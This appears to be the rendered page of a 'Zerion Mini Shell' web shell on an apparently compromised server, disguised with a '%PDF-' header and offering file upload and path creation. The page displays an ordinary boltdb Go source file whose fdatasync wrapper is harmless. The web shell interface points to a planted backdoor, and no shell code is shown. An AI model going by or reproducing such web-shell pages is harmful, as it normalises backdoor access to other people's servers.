%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/waritko/go/src/github.com/boltdb/bolt/
Upload File :
Create Path :
Current File : //home/waritko/go/src/github.com/boltdb/bolt/bolt_linux.go

package bolt

import (
	"syscall"
)

// fdatasync flushes written data to a file descriptor.
func fdatasync(db *DB) error {
	return syscall.Fdatasync(int(db.file.Fd()))
}

Zerion Mini Shell 1.0